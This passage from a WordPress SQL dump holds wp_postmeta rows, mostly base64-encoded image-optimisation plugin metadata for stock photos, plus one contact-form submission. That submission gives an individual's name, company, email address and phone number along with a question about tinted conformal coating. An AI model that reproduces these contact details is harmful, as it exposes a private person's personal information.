NDI4OTYwMjUxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MTMsInRpbWUiOjE0ODM1ODIwMzgsImlkIjo3Njh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI4OTYwMjUxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyODk2MDI1MS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjg5NjAyNTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQxOSwidGltZSI6MTQ4MzU4MjA0MSwiaWQiOjc2OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjg5NjAyNTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI4OTYwMjUxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyODk2MDI1MS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTU1LCJ0aW1lIjoxNDgzNTgyMDQ1LCJpZCI6NzY4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyODk2MDI1MS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjg5NjAyNTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI4OTYwMjUxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1OTEsInRpbWUiOjE0ODM1ODIwNDgsImlkIjo3Njh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI4OTYwMjUxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyODk2MDI1MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjg5NjAyNTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjczNiwidGltZSI6MTQ4MzU4MjA1MiwiaWQiOjc2OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29984, 3396, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (29985, 3396, '_seq_num', '206'); 
INSERT INTO `wp_postmeta` VALUES (29986, 3396, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (29987, 3396, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (29988, 3396, '_field_1', 'Juan Martinez'); 
INSERT INTO `wp_postmeta` VALUES (29989, 3396, '_field_10', 'WET Design'); 
INSERT INTO `wp_postmeta` VALUES (29990, 3396, '_field_2', 'juan.martinez@wetdesign.com'); 
INSERT INTO `wp_postmeta` VALUES (29991, 3396, '_field_8', '310-384-5850'); 
INSERT INTO `wp_postmeta` VALUES (29992, 3396, '_field_3', 'Do you guys offer a tinted version of Silicone Conformal Coating similar in specs to your MS-460H/462H coating so there is no need to use a UV Light to know  how well you coated a PCB board. '); 
INSERT INTO `wp_postmeta` VALUES (29993, 3396, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (29994, 3396, '_sub_id', '3396'); 
INSERT INTO `wp_postmeta` VALUES (29995, 767, 'wpfc_optimisation_reduction', '12074'); 
INSERT INTO `wp_postmeta` VALUES (29996, 767, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEuanBnIiwid2lkdGgiOjgwMDAsImhlaWdodCI6NDAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MjA1NywiaWQiOiI3NjcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTcxLCJ0aW1lIjoxNDgzNTgyMDYwLCJpZCI6NzY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtODAweDQwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTgwMHg0MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS04MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6OTc5LCJ0aW1lIjoxNDgzNTgyMDYzLCJpZCI6NzY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtNzY4eDM4NC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjM4NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTc2OHgzODQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS03Njh4Mzg0LmpwZyIsInJlZHVjdGlvbiI6OTM2LCJ0aW1lIjoxNDgzNTgyMDY3LCJpZCI6NzY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMTYwMHg4MDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMTYwMHg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0xNjAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjQ3MDgsInRpbWUiOjE0ODM1ODIwNzEsImlkIjo3Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0NzMsInRpbWUiOjE0ODM1ODIwNzUsImlkIjo3Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MzMsInRpbWUiOjE0ODM1ODIwNzgsImlkIjo3Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NTQsInRpbWUiOjE0ODM1ODIwODEsImlkIjo3Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5NDgsInRpbWUiOjE0ODM1ODIwODUsImlkIjo3Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQyNywidGltZSI6MTQ4MzU4MjA4OCwiaWQiOjc2N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDM2LCJ0aW1lIjoxNDgzNTgyMDkyLCJpZCI6NzY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0OTksInRpbWUiOjE0ODM1ODIwOTUsImlkIjo3Njd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU1NywidGltZSI6MTQ4MzU4MjA5OCwiaWQiOjc2N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180MjE0ODM5MjEtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDIxNDgzOTIxLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyMTQ4MzkyMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NjUzLCJ0aW1lIjoxNDgzNTgyMTAyLCJpZCI6NzY3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29997, 766, 'wpfc_optimisation_reduction', '15550'); 
INSERT INTO `wp_postmeta` VALUES (29998, 766, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYuanBnIiwid2lkdGgiOjU3NjAsImhlaWdodCI6Mzg0MCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MjEwNywiaWQiOiI3NjYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTc2LCJ0aW1lIjoxNDgzNTgyMTEwLCJpZCI6NzY2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTQ0NywidGltZSI6MTQ4MzU4MjExNCwiaWQiOjc2Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEyNDcsInRpbWUiOjE0ODM1ODIxMTgsImlkIjo3NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjc1MzIsInRpbWUiOjE0ODM1ODIxMjIsImlkIjo3NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0NjUsInRpbWUiOjE0ODM1ODIxMjUsImlkIjo3NjZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM5NTI0NDg1Ni0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zOTUyNDQ4NTYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzk1MjQ0ODU2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjozOTksInRpbWUiOjE0ODM1ODIxMjksImlkIjo3NjZ9LHs